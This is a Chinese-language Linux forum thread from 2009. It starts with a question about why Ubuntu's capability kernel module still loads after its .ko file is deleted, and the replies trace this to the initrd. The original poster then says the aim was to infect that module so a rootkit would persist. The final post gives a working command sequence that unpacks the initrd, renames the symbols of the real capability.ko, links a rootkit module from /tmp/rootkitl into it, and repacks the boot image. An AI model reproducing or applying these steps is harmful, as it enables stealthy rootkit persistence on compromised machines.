免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 4313 | 回复: 6
打印 上一主题 下一主题

ubuntu的lkm模块是怎么自动加载的呢? [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-07-21 21:55 |只看该作者 |倒序浏览
遇到一个很奇怪的问题,为什么我把/lib/modules/2.6.20-15-generic下的capability.ko文件删除了系统还能正确加载capability模块呢?

我在系统中只找到两个capability.ko并全部删除了,可是系统重启后模块还是会自动加载,是有其他的备份文件吗?

论坛徽章:
14
水瓶座
日期:2014-06-10 09:51:0215-16赛季CBA联赛之江苏
日期:2017-11-27 11:42:3515-16赛季CBA联赛之八一
日期:2017-04-12 14:26:2815-16赛季CBA联赛之吉林
日期:2016-08-20 10:43:1215-16赛季CBA联赛之广夏
日期:2016-06-23 09:53:58程序设计版块每日发帖之星
日期:2016-02-11 06:20:00程序设计版块每日发帖之星
日期:2016-02-09 06:20:0015-16赛季CBA联赛之上海
日期:2015-12-25 16:40:3515-16赛季CBA联赛之广夏
日期:2015-12-22 09:39:36程序设计版块每日发帖之星
日期:2015-08-24 06:20:002015亚冠之德黑兰石油
日期:2015-08-07 09:57:302015年辞旧岁徽章
日期:2015-03-03 16:54:15
2 [报告]
发表于 2009-07-22 10:35 |只看该作者
这个~
你查一下etc下面的文件是如何启动加载模块的好了~
init.d X11, rcS.d等下面的东西~

论坛徽章:
0
3 [报告]
发表于 2009-07-22 13:07 |只看该作者
还有一个INITRD吧~ 会不会是在这里面加载的~

论坛徽章:
0
4 [报告]
发表于 2009-07-22 13:40 |只看该作者
strace modprobe capability看一下加载得是哪里的ko

论坛徽章:
0
5 [报告]
发表于 2009-07-22 14:44 |只看该作者
initrd-xxx.xxx.xx.img里的。。用cpio解开就知道

论坛徽章:
0
6 [报告]
发表于 2009-07-23 09:12 |只看该作者

回复 #5 wheel 的帖子

郁闷,本来想通过感染capability模块实现自动加载的,这下没戏了

论坛徽章:
0
7 [报告]
发表于 2009-07-23 16:35 |只看该作者
cp /boot/initrd.img-2.6.20-15-generic initrd.img-2.6.20-15-generic.bak
cp initrd.img-2.6.20-15-generic.bak initrd.img.gz
gunzip initrd.img.gz
mkdir initrd
cd initrd
cpio -id<../initrd.img
cd ./lib/modules/2.6.20-15-generic/kernel/security
mv capability.ko old.ko
/tmp/rootkitl/chstr old.ko init_module init_000000
/tmp/rootkitl/chstr old.ko cleanup_module cleanup_000000
ld -r /tmp/rootkitl/capability.ko old.ko -o capability.ko
rm old.ko
rmmod capability
insmod capability.ko
cd /tmp/rootkitl/initrd
find .|cpio -oH newc|gzip -9>/boot/initrd.img-2.6.20-15-generic

终于成功了
:)

[ 本帖最后由 hackisle 于 2009-7-25 14:24 编辑 ]
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP